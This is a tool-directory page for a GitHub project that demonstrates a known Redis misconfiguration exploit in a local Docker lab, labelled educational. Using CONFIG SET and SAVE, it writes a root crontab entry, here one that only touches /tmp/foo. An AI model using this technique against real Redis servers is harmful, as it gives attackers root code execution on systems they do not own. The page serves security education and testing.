Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
redis-exploitation — CONFIG SET | Kitploit
Tools/GitHubGitHub/knqyf263/redis-exploitation
Privilege EscalationExploitationPenetration TestingMisconfigurationLearning & EducationDatabase Security
GitHubknqyf263/redis-exploitation

redis-exploitation

CONFIG SET

View Repository
17 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

redis-exploitation

CONFIG SET (For educational purposes only)

Build

root@kitploit:~
$ docker build -t victim .

Run

root@kitploit:~
$ docker run -d --name victim victim

Attack

root@kitploit:~
$ docker exec -it victim bash
root@kitploit:~
[root@34ea33cb2eb2 /]# ls /var/spool/cron/
[root@34ea33cb2eb2 /]# redis-cli
127.0.0.1:6379> config set dir /var/spool/cron/
OK
127.0.0.1:6379> config set dbfilename root
OK
127.0.0.1:6379> set payload "\n*/1 * * * * /bin/touch /tmp/foo\n"
OK
127.0.0.1:6379> save
OK
127.0.0.1:6379>
[root@34ea33cb2eb2 /]# cat /var/spool/cron/root
REDIS0007       redis-ver3.2.12
redis-bits@ctime]&used-meme
                           payload!
*/1 * * * * /bin/touch /tmp/foo
5[root@34ea33cb2eb2 /]#
Download Tool